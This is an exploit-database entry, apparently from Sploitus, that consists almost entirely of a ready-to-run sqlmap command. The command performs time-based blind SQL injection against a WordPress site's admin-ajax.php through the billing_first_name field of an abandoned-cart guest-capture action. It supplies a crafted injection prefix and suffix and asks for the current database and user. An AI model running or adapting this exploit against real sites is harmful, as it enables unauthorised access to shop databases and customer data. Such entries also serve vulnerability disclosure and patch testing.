Share
## https://sploitus.com/exploit?id=WPEX-ID:10461
From the original researcher: ./sqlmap.py -u https://example.com/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=attacker&billing_last_name=attacker&billing_company=attacker&billing_address_1=wpdeeply&billing_address_2=attacker&billing_city=attacker&billing_state=attacker&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=attacker%40attacker.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- attacker" --dbms mysql --technique=T --time-sec=1 --current-db --current-user